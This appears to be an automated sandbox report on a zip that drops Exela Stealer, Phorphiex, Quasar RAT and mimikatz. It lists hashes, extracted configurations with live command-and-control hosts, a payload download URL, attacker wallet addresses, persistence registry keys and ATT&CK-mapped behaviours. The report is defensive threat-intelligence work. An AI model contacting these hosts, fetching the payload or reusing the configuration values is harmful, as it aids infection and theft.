exelastealer | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
1199s
max time network
1202s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
28-11-2024 19:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe.zip
Size

4KB
MD5

16d34133af438a73419a49de605576d9
SHA1

c3dbcd70359fdad8835091c714a7a275c59bd732
SHA256

e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
SHA512

59c0272d6faa2682b7a6ce1cd414d53cc39f06035f4f38a2e206965805034bf8012b02d59f428973965136d70c89f87ac3b17b5db9c1b1d49844be182b47a3d7
SSDEEP

96:xBf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEy:xBfwncSf8Cv3w9DZjKXjmBIKEvLs97D5

Score

10^/10

exelastealer mimikatz phorphiex quasar office04 collection defense_evasion discovery evasion execution loader persistence privilege_escalation spyware stealer trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://37.1.196.35/un2/botui.dat

Extracted

Family

phorphiex

http://185.215.113.66/

http://91.202.233.141/

Wallets

0xCa90599132C4D88907Bd8E046540284aa468a035

TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6

qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r

XryzFMFVpDUvU7famUGf214EXD3xNUSmQf

rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9

AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z

LdgchXq1sKbAaAJ1EXAPSRBzLb8jnTZstT

MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q

4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK

15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC

1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK

ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp

3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc

3ESHude8zUHksQg1h6hHmzY79BS36L91Yn

DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA

t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh

stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj

bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2

bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr

bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd

Attributes

mutex
753f85d83d
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36

Extracted

Family

phorphiex

http://185.215.113.84

http://185.215.113.66

185.215.113.66

Extracted

Family

quasar

Version

1.4.0

Botnet

Office04

microsoftsys.ddns.net:4782

Mutex

67e0653d-eedf-4888-88ab-78e97eb2df27

Attributes

encryption_key
23E5F6D22FEE1750D36544A759A48349B064BC34
install_name
PerfWatson1.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svhost
subdirectory
KDOT

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Exelastealer family
exelastealer
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x001900000002aacc-58.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0002000000025cce-4142.dat	family_quasar
behavioral1/memory/1420-4149-0x0000000000230000-0x0000000000554000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs

Processes:

PURLOG.exe1622938899.exewinupsecvmgr.exeRestructuring.pif

description	pid	Process	procid_target
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 4444 created 3332	4444	PURLOG.exe	52
PID 1372 created 3332	1372	1622938899.exe	52
PID 1372 created 3332	1372	1622938899.exe	52
PID 2028 created 3332	2028	winupsecvmgr.exe	52
PID 2028 created 3332	2028	winupsecvmgr.exe	52
PID 2028 created 3332	2028	winupsecvmgr.exe	52
PID 3488 created 3332	3488	Restructuring.pif	52

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000500000002a3da-4474.dat	mimikatz

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exe

flow	pid	Process
103	3204	powershell.exe
137	3204	powershell.exe
167	3204	powershell.exe
199	3204	powershell.exe
222	3204	powershell.exe
252	3204	powershell.exe
279	3204	powershell.exe
298	3204	powershell.exe
330	3204	powershell.exe
353	3204	powershell.exe
379	3204	powershell.exe
407	3204	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
764	netsh.exe
4860	netsh.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

Processes:

cmd.exepowershell.exe

pid	Process
4900	cmd.exe
1820	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

4363463463464363463463463.exeewrvuh.exePURLOG.exem.exetest16.exesysnldcvmr.exeup.exe1809827666.exe2420715866.exe1622938899.exe164314122.exewinupsecvmgr.exe2603430756.exe1888623094.exe1431716774.exepei.exePctOccurred.exebuilt.exe120131490.exePerfWatson1.exeRestructuring.pifPerfWatson1.exetwztl.exePerfWatson1.exebuild11.exestub.exe2641813856.exewin.exePerfWatson1.exesysnldcvmr.exePerfWatson1.exe2755424256.exe1716412561.exePerfWatson1.exeRestructuring.pif386833483.exe1259121635.exePerfWatson1.exe1592010501.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exemimikatz.exepyl64.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exePerfWatson1.exe

pid	Process
5012	4363463463464363463463463.exe
2936	ewrvuh.exe
4444	PURLOG.exe
2308	m.exe
3344	test16.exe
3476	sysnldcvmr.exe
2776	up.exe
3116	1809827666.exe
2396	2420715866.exe
1372	1622938899.exe
4496	164314122.exe
2028	winupsecvmgr.exe
464	2603430756.exe
652	1888623094.exe
4348	1431716774.exe
5040	pei.exe
1940	PctOccurred.exe
1420	built.exe
4660	120131490.exe
2860	PerfWatson1.exe
3488	Restructuring.pif
5112	PerfWatson1.exe
1868	twztl.exe
1140	PerfWatson1.exe
2992	build11.exe
4824	stub.exe
1140	2641813856.exe
1560	win.exe
3288	PerfWatson1.exe
1064	sysnldcvmr.exe
2012	PerfWatson1.exe
2756	2755424256.exe
4720	1716412561.exe
4304	PerfWatson1.exe
5064	Restructuring.pif
1864	386833483.exe
3936	1259121635.exe
3112	PerfWatson1.exe
1580	1592010501.exe
240	PerfWatson1.exe
5096	PerfWatson1.exe
1964	PerfWatson1.exe
1544	PerfWatson1.exe
1444	PerfWatson1.exe
1540	PerfWatson1.exe
1816	PerfWatson1.exe
1096	PerfWatson1.exe
5028	mimikatz.exe
3828	pyl64.exe
3100	PerfWatson1.exe
976	PerfWatson1.exe
4840	PerfWatson1.exe
2616	PerfWatson1.exe
3372	PerfWatson1.exe
3900	PerfWatson1.exe
2916	PerfWatson1.exe
1376	PerfWatson1.exe
4444	PerfWatson1.exe
4476	PerfWatson1.exe
1036	PerfWatson1.exe
2420	PerfWatson1.exe
2340	PerfWatson1.exe
1116	PerfWatson1.exe
4652	PerfWatson1.exe

Loads dropped DLL 32 IoCs

Processes:

stub.exe

pid	Process
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe
4824	stub.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

win.exe2641813856.exem.exereg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe"	win.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	2641813856.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	m.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid	Process
696	powershell.exe
1980	powershell.exe
3204	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
3	raw.githubusercontent.com
36	raw.githubusercontent.com
57	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
7	ip-api.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

Processes:

ARP.EXEcmd.exearp.exe

pid	Process
4680	ARP.EXE
4228	cmd.exe
1768	arp.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	Process
1656	tasklist.exe
2904	tasklist.exe
2376	tasklist.exe
2504	tasklist.exe
4240	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Processes:

cmd.exe

pid	Process
1444	cmd.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

PURLOG.exewinupsecvmgr.exeRestructuring.pif

description	pid	Process	procid_target
PID 4444 set thread context of 3736	4444	PURLOG.exe	107
PID 2028 set thread context of 2732	2028	winupsecvmgr.exe	121
PID 2028 set thread context of 3176	2028	winupsecvmgr.exe	122
PID 3488 set thread context of 5064	3488	Restructuring.pif	258

Drops file in Windows directory 3 IoCs

Processes:

m.exe2641813856.exe

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	m.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	m.exe
File created	C:\Windows\sysnldcvmr.exe	2641813856.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid	Process
1036	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

tasklist.exechoice.exe1716412561.exe1592010501.exefindstr.exeRestructuring.pifmimikatz.exeewrvuh.execmd.exetasklist.exe1259121635.exe1431716774.exe2603430756.exefindstr.execmd.exeup.exe1888623094.exePctOccurred.exe120131490.exe4363463463464363463463463.exe164314122.exeroute.exesysnldcvmr.exe2420715866.exe2641813856.exearp.exesysnldcvmr.exe386833483.exem.exefindstr.execmd.exeRestructuring.piftwztl.exewin.exepei.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1716412561.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1592010501.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Restructuring.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ewrvuh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1259121635.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1431716774.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2603430756.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	up.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1888623094.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PctOccurred.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	120131490.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	164314122.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	route.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2420715866.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2641813856.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	arp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysnldcvmr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	386833483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	m.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Restructuring.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	twztl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pei.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	Process
1792	PING.EXE
2672	PING.EXE
560	PING.EXE
2444	PING.EXE
2420	PING.EXE
4736	PING.EXE
540	PING.EXE
2308	PING.EXE
3296	PING.EXE
1420	PING.EXE
1368	PING.EXE
4660	PING.EXE
3604	PING.EXE
1840	PING.EXE
4768	PING.EXE
788	PING.EXE
2912	PING.EXE
1252	PING.EXE
5024	PING.EXE
764	PING.EXE
2428	PING.EXE
4476	PING.EXE
5016	PING.EXE
3484	PING.EXE
4500	PING.EXE
5092	PING.EXE
2244	PING.EXE
3844	PING.EXE
3536	PING.EXE
492	PING.EXE
4644	PING.EXE
3024	PING.EXE
3312	PING.EXE
2156	PING.EXE
2156	PING.EXE
3680	PING.EXE
5016	PING.EXE
2672	PING.EXE
3724	PING.EXE
3988	PING.EXE
4652	PING.EXE
2156	PING.EXE
2304	PING.EXE
1800	PING.EXE
1116	PING.EXE
1784	PING.EXE
1784	PING.EXE
4528	PING.EXE
1692	PING.EXE
2836	PING.EXE
1420	PING.EXE
2584	PING.EXE
3320	PING.EXE
3856	PING.EXE
4016	PING.EXE
3604	PING.EXE
4836	PING.EXE
1284	PING.EXE
4916	PING.EXE
176	PING.EXE
1388	PING.EXE
968	PING.EXE
2968	PING.EXE
4340	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

Processes:

cmd.exenetsh.exe

pid	Process
4992	cmd.exe
3156	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

Processes:

NETSTAT.EXE

pid	Process
3536	NETSTAT.EXE

NSIS installer 1 IoCs

installer

Processes:

resource	yara_rule
behavioral1/files/0x0003000000000695-4325.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

up.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	up.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	up.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	up.exe

Collects information from the system 1 TTPs 1 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

Processes:

WMIC.exe

pid	Process
4076	WMIC.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeNETSTAT.EXE

pid	Process
2360	ipconfig.exe
3536	NETSTAT.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

Processes:

systeminfo.exe

pid	Process
1224	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
1068	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

pid	Process
4724	PING.EXE
1528	PING.EXE
788	PING.EXE
2304	PING.EXE
4972	PING.EXE
1800	PING.EXE
3596	PING.EXE
540	PING.EXE
4224	PING.EXE
4680	PING.EXE
3180	PING.EXE
2672	PING.EXE
4836	PING.EXE
3004	PING.EXE
3528	PING.EXE
2912	PING.EXE
2968	PING.EXE
764	PING.EXE
4652	PING.EXE
3988	PING.EXE
2428	PING.EXE
3296	PING.EXE
3720	PING.EXE
944	PING.EXE
3856	PING.EXE
4708	PING.EXE
176	PING.EXE
3536	PING.EXE
2584	PING.EXE
3604	PING.EXE
3896	PING.EXE
1692	PING.EXE
2908	PING.EXE
2444	PING.EXE
3312	PING.EXE
968	PING.EXE
5016	PING.EXE
3604	PING.EXE
1784	PING.EXE
1792	PING.EXE
1784	PING.EXE
1388	PING.EXE
2472	PING.EXE
2068	PING.EXE
3844	PING.EXE
3608	PING.EXE
4476	PING.EXE
5092	PING.EXE
1284	PING.EXE
2836	PING.EXE
3156	PING.EXE
5016	PING.EXE
400	PING.EXE
1604	PING.EXE
1420	PING.EXE
3856	PING.EXE
2156	PING.EXE
4916	PING.EXE
4980	PING.EXE
1220	PING.EXE
3008	PING.EXE
4340	PING.EXE
2156	PING.EXE
1816	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
4240	schtasks.exe
2952	schtasks.exe
5052	schtasks.exe
1692	schtasks.exe
3116	schtasks.exe
1900	schtasks.exe
3892	schtasks.exe
720	schtasks.exe
4144	schtasks.exe
696	schtasks.exe
2836	schtasks.exe
4948	schtasks.exe
1540	schtasks.exe
4124	schtasks.exe
1996	schtasks.exe
2520	schtasks.exe
4404	schtasks.exe
3880	schtasks.exe
240	schtasks.exe
2368	schtasks.exe
4808	schtasks.exe
920	schtasks.exe
1904	schtasks.exe
4692	schtasks.exe
4072	schtasks.exe
4512	schtasks.exe
4288	schtasks.exe
1980	schtasks.exe
1220	schtasks.exe
1416	schtasks.exe
2968	schtasks.exe
1100	schtasks.exe
788	schtasks.exe
2584	schtasks.exe
2384	schtasks.exe
2392	schtasks.exe
4636	schtasks.exe
2016	schtasks.exe
1016	schtasks.exe
1144	schtasks.exe
920	schtasks.exe
232	schtasks.exe
3596	schtasks.exe
2996	schtasks.exe
1096	schtasks.exe
1052	schtasks.exe
2044	schtasks.exe
3160	schtasks.exe
3744	schtasks.exe
3432	schtasks.exe
1876	schtasks.exe
1316	schtasks.exe
1444	schtasks.exe
1244	schtasks.exe
4888	schtasks.exe
896	schtasks.exe
4484	schtasks.exe
4768	schtasks.exe
3512	schtasks.exe
3068	schtasks.exe
2808	schtasks.exe
2160	schtasks.exe
2000	schtasks.exe
4084	schtasks.exe

Suspicious behavior: EnumeratesProcesses 59 IoCs

Processes:

up.exe1809827666.exePURLOG.exepowershell.exe1622938899.exepowershell.exewinupsecvmgr.exepowershell.exeRestructuring.pifpowershell.exe2755424256.exepyl64.exepowershell.exe

pid	Process
2776	up.exe
2776	up.exe
3116	1809827666.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
4444	PURLOG.exe
3004	powershell.exe
1372	1622938899.exe
1372	1622938899.exe
696	powershell.exe
3004	powershell.exe
696	powershell.exe
1372	1622938899.exe
1372	1622938899.exe
2028	winupsecvmgr.exe
2028	winupsecvmgr.exe
1980	powershell.exe
1980	powershell.exe
2028	winupsecvmgr.exe
2028	winupsecvmgr.exe
2028	winupsecvmgr.exe
2028	winupsecvmgr.exe
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
1820	powershell.exe
1820	powershell.exe
1820	powershell.exe
2756	2755424256.exe
2756	2755424256.exe
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3488	Restructuring.pif
3828	pyl64.exe
3204	powershell.exe
3204	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
3332	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exe4363463463464363463463463.exePURLOG.exe1809827666.exepowershell.exepowershell.exeInstallUtil.exe

description	pid	Process
Token: SeRestorePrivilege	2708	7zFM.exe
Token: 35	2708	7zFM.exe
Token: SeSecurityPrivilege	2708	7zFM.exe
Token: SeDebugPrivilege	5012	4363463463464363463463463.exe
Token: SeDebugPrivilege	4444	PURLOG.exe
Token: SeDebugPrivilege	3116	1809827666.exe
Token: SeDebugPrivilege	4444	PURLOG.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	3736	InstallUtil.exe
Token: SeIncreaseQuotaPrivilege	696	powershell.exe
Token: SeSecurityPrivilege	696	powershell.exe
Token: SeTakeOwnershipPrivilege	696	powershell.exe
Token: SeLoadDriverPrivilege	696	powershell.exe
Token: SeSystemProfilePrivilege	696	powershell.exe
Token: SeSystemtimePrivilege	696	powershell.exe
Token: SeProfSingleProcessPrivilege	696	powershell.exe
Token: SeIncBasePriorityPrivilege	696	powershell.exe
Token: SeCreatePagefilePrivilege	696	powershell.exe
Token: SeBackupPrivilege	696	powershell.exe
Token: SeRestorePrivilege	696	powershell.exe
Token: SeShutdownPrivilege	696	powershell.exe
Token: SeDebugPrivilege	696	powershell.exe
Token: SeSystemEnvironmentPrivilege	696	powershell.exe
Token: SeRemoteShutdownPrivilege	696	powershell.exe
Token: SeUndockPrivilege	696	powershell.exe
Token: SeManageVolumePrivilege	696	powershell.exe
Token: 33	696	powershell.exe
Token: 34	696	powershell.exe
Token: 35	696	powershell.exe
Token: 36	696	powershell.exe
Token: SeIncreaseQuotaPrivilege	696	powershell.exe
Token: SeSecurityPrivilege	696	powershell.exe
Token: SeTakeOwnershipPrivilege	696	powershell.exe
